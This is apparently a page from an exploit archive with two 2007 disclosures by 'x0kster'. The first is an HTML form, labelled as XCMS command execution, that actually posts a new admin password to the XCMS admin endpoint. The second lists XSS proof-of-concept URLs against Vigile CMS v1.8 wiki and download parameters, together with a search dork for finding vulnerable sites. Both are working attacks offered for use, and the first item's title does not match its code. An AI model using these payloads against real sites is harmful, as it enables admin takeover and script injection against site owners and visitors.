xcms all version arbitrary code execution
!-- -[ Name : XCMS Arbitrary Command Execution Vulnerability ]- -[ Download : http://www.xcms.it/index.php?lng=itmod=downloadpg=indicec=2 ]- -[ Author : x0kster]- -[ Email: x0kster[AT]gmail[DOT]com ]- -[ Date : 20-09-2007 ]- -- html head title-XCMS Arbitrary Command Execution Vuln by x0kster -/title /head body pre - [XCMS All Version Arbitrary Command Execution Vulnerability ] - - [Bug found by x0kster - [EMAIL PROTECTED] ] - /pre form name=pass method=post action=http://www.xcms.it/index.php?lng=itamp;pg=adminamp;s=cpass; input type=hidden name=pass value=1190316852 / pre Password: input type=password size=20 name=password_1190316852 / Repete password : input type=password size=20 name=rpassword_1190316852 / input type=submit value=Modifica Password / /pre /form /body /html
Vigile CMS v1.8 Multiple Remote XSS Vulnerability
# Name : Vigile CMS v1.8 Multiple Remote XSS Vulnerability # Download : http://www.itcms.it/ # Date : 20-09-2007 # Author : x0kster # Mail : [EMAIL PROTECTED] # Note : For works, the wiki or the download module must be installed in the site. # # PoCs : # # Wiki 1 : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[WIKINAME]title=[XSS] # Wiki 2 : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[WIKINAME]?title=[XSS] # Download 1 : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[DOWNLOADNAME]cat=[XSS] # Download 2 : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[DOWNLOADNAME]/cat=[XSS] # # # Dork : tutti i contenuti, notizie, e commenti sono anche opera degli utenti, ogni violazione sarĂ eliminata dietro segnalazione.
